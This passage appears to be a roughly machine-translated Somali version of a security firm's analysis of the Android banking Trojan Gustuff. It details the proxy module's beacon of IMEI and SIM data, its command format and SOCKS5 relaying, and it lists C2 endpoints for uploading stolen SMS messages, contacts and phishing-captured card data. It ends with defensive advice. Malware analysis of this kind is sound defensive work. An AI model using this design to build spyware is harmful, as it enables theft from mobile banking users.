Sidoo kale marka dhacdada la kiciyo android.net.conn.CONNECTIVITY_CHANGE Qaabka wakiillada waa la bilaabay.

2. Codsigu wuxuu abuuraa quful toosan oo leh cabbirka QAYB_WAKE_LOCK wuuna qabtay. Tani waxay ka hortagtaa qalabka CPU inuu galo qaabka hurdada.

3. Wuxuu bilaabaa fasalka habbaynta amarka ee moduleka wakiilnimada, isagoo marka hore gelaya khadka mainLog ("startarka bilawga") и

Server :: bilow () martigeliyaha[<%proxy_cnc%>], CommandPort[<%command_port%>], proxyPort[<%proxy_port%>]

halkaas oo proxy_cnc, Command_port iyo proxy_port - xuduudaha laga helay qaabeynta server-ka wakiilnimada.

Qaybta habbaynta amarka ayaa loo yaqaan Xiriirinta Command. Isla markiiba ka dib bilawga, waxay fulisaa falalka soo socda:

4. Ku xidha ProxyConfigClass.host: ProxyConfigClass.commandPort oo u soo dirtaa xogta ku saabsan aaladda cudurka qaba qaab JSON:

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

Xagee:

  • id – aqoonsi, waxa uu isku dayaa in uu qiimihiisu ka helo goobta “id” ee faylka Xulashada La wadaago ee magaciisu yahay “x”. Haddii qiimahan la heli waayo, waxay soo saartaa mid cusub. Markaa, moduleka wakiilku wuxuu leeyahay aqoonsi u gaar ah, kaas oo loo soo saaray si la mid ah Aqoonsiga Bot.
  • imei - IMEI ee qalabka. Haddii qalad dhacay inta lagu guda jiro habka helitaanka qiimaha, fariin qoraal qalad ah ayaa la qori doonaa halkii goobtan.
  • imsi - Aqoonsiga macaamiisha mobilada caalamiga ah ee aaladda. Haddii qalad dhacay inta lagu guda jiro habka helitaanka qiimaha, fariin qoraal qalad ah ayaa la qori doonaa halkii goobtan.
  • model - Magaca isticmaale-dhamaadka-muuqda ee badeecada dhamaadka.
  • saaraha - Soo saaraha alaabta / qalabka (Build.MANUFACTURER).
  • androidVersion - xadhig u qaabaysan "<% release_version%> (<%os_version%>),<%sdk_version%>"
  • dalka - meesha hadda ee qalabka.
  • partnerId waa xadhig madhan.
  • Magaca xirmada - magaca xirmada.
  • networkType - nooca isku xirka shabakada hadda (tusaale: "WIFI", "MOBILE"). Haddii ay dhacdo khalad, soo noqda waxba.
  • hasGsmSupport – run – haddii telifoonku taageero GSM, haddii kale been.
  • SIMReady – Xaaladda kaarka SIM-ka.
  • SIMCountry - ISO code dalka (ku salaysan bixiyaha SIM card).
  • NetworkOperator - magaca hawlwadeenka. Haddii qalad dhacay inta lagu guda jiro habka helitaanka qiimaha, fariin qoraal qalad ah ayaa la qori doonaa halkii goobtan.
  • simOperator - Magaca Bixiyaha Adeegga (SPN). Haddii qalad dhacay inta lagu guda jiro habka helitaanka qiimaha, fariin qoraal qalad ah ayaa la qori doonaa halkii goobtan.
  • nooca - goobtan waxaa lagu kaydiyaa fasalka config; ee noocyada la tijaabiyay ee bot waxay la mid tahay "1.6".

5. U beddelo habka sugitaanka amarrada server-ka. Awaamiirta ka soo baxda server-ka waxay u yimaadaan qaabka:

  • 0 offset - amar
  • 1 offset - sessionId
  • 2 offset - dhererka
  • 4 offset - xogta

Markuu amar yimaado, codsigu wuxuu diiwaan galiyaa:
mainLog

Amarrada soo socda ee ka imanaya server-ka waa suurtagal:

magaca Command Data Description
xiriirId 0 Aqoonsiga xidhiidhka Abuur xidhiidh cusub
SLEEP 3 Time Jooji moduleka wakiilnimada
PING_PONG 4 - Dir fariin PONG

Fariinta PONG waxay ka kooban tahay 4 bytes waxayna u egtahay sidan: 0x04000000.

Marka amarka connectionId la helo (si loo abuuro xidhiidh cusub) Xiriirinta Command abuuraa tusaale fasal ProxyConnection.

  • Laba fasal ayaa ka qaybqaata wakiilnimada: ProxyConnection и dhamaadka. Marka la abuurayo fasalka ProxyConnection ku xidhidhiyaha ciwaanka ProxyConfigClass.host: ProxyConfigClass.proxyPort iyo gudbinta shayga JSON:

 {
    "id":<%connectionId%>
}

Isagoo ka jawaabaya, server-ku wuxuu soo dirayaa fariin SOCKS5 oo ka kooban ciwaanka server-ka fog ee ay tahay in la sameeyo xiriirka. Isdhexgalka server-kan wuxuu ku dhacaa fasalka dhexdiisa dhamaadka. Habaynta isku xidhka waxa loo matali karaa qaab ahaan sida soo socota:

Sida Android Trojan Gustuff uu uga saaro kiriimka (fiat iyo crypto) akoonnadaada

Isdhexgalka shabakada

Si looga hortago falanqaynta taraafikada ee sniffers network, isdhexgalka u dhexeeya server-ka CnC iyo codsiga waa la ilaalin karaa iyada oo la isticmaalayo borotokoolka SSL. Dhammaan xogta la gudbiyo ee laga keenay iyo server-kaba waxa lagu soo bandhigay qaabka JSON. Codsigu wuxuu fuliyaa codsiyada soo socda inta lagu jiro hawlgalka:

  • http://<%CnC%>/api/v1/set_state.php - natiijada fulinta amarka.
  • http://<%CnC%>/api/v1/get.php - qaadashada amar.
  • http://<%CnC%>/api/v1/load_sms.php - ka soo dejinta fariimaha SMS-ka ee aaladda cudurka qaba.
  • http://<%CnC%>/api/v1/load_ab.php - ka soo dejinta liiska xiriirada aaladaha cudurka qaba.
  • http://<%CnC%>/api/v1/aevents.php - Codsiga waxaa la sameeyaa marka la cusboonaysiinayo cabbirrada ku yaal faylka doorbidida.
  • http://<%CnC%>/api/v1/set_card.php - soo raritaanka xogta la helay iyadoo la isticmaalayo daaqada phishing-ka oo isu ekeysiinaysa sidii Google Play Market.
  • http://<%CnC%>/api/v1/logs.php - soo dejinta xogta log.
  • http://<%CnC%>/api/v1/records.php - soo gelinta xogta laga helay daaqadaha phishing.
  • http://<%CnC%>/api/v1/set_error.php - ogeysiinta khalad dhacay.

talooyinka

Si ay macaamiishooda uga ilaaliyaan khatarta Trojans-ka moobiilka, shirkaduhu waa inay isticmaalaan xalal dhammaystiran oo u oggolaanaya inay la socdaan oo ay ka hortagaan falalka xaasidnimada ah iyaga oo aan ku rakibin software dheeraad ah qalabka isticmaalaha.

Si tan loo sameeyo, hababka saxeexa ee lagu ogaanayo Trojans-ka mobilada waxay u baahan yihiin in lagu xoojiyo tignoolajiyada lagu falanqeeyo habdhaqanka macmiilka iyo codsiga laftiisa. Ilaalinta waa in sidoo kale lagu daraa shaqada aqoonsiga aaladda iyadoo la adeegsanayo tignoolajiyada faraha dhijitaalka ah, taas oo suurtagelin doonta in la fahmo marka koontada laga isticmaalayo qalab aan caadi ahayn oo uu horay ugu dhacay gacanta tuugo.

Qodobka aasaasiga ah ee muhiimka ah waa helitaanka falanqaynta kanaalka, kaas oo u oggolaanaya shirkadaha inay xakameeyaan khatarta ka imanaysa internetka oo keliya, laakiin sidoo kale kanaalka mobilada, tusaale ahaan, codsiyada bangiyada mobilada, wax kala iibsiga la cryptocurrencies iyo wax kasta oo kale wax kala iibsiga waa la samayn karaa.

Xeerarka badbaadada isticmaalayaasha:

  • ha ku rakibin codsiyada aaladaha mobilada ee leh Android OS ilo aan Google Play ahayn, fiiro gaar ah u yeelo xuquuqda uu codsado codsigu;
  • si joogto ah u rakib Android OS updates;
  • fiiro gaar ah u leh kordhinta faylasha la soo dejiyey;
  • ha booqan ilaha laga shakiyo;
  • Ha gujin xiriiriyeyaasha lagu helo fariimaha SMS-ka.

Jilaya Semyon Rogacheva, takhasus yar oo ku takhasusay cilmi-baarista malware-ka ee kooxda-IB Computer Forensics Laboratory.

Source: www.habr.com

Add a comment